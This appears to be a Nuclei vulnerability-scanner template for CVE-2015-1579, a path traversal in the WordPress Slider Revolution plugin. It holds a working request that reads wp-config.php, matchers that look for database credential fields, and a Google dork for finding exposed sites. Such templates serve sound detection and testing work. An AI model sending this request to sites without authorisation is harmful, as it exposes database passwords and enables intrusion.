id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x severity: high description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-1579 cwe-id: CWE-22 metadata: google-dork: inurl:/wp-content/plugins/revslider tags: cve,cve2015,wordpress,wp-plugin,lfi,revslider,wp requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "'DB_NAME'" - "'DB_PASSWORD'" - "'DB_USER'" condition: and - type: status status: - 200 # Enhanced by mp on 2022/07/29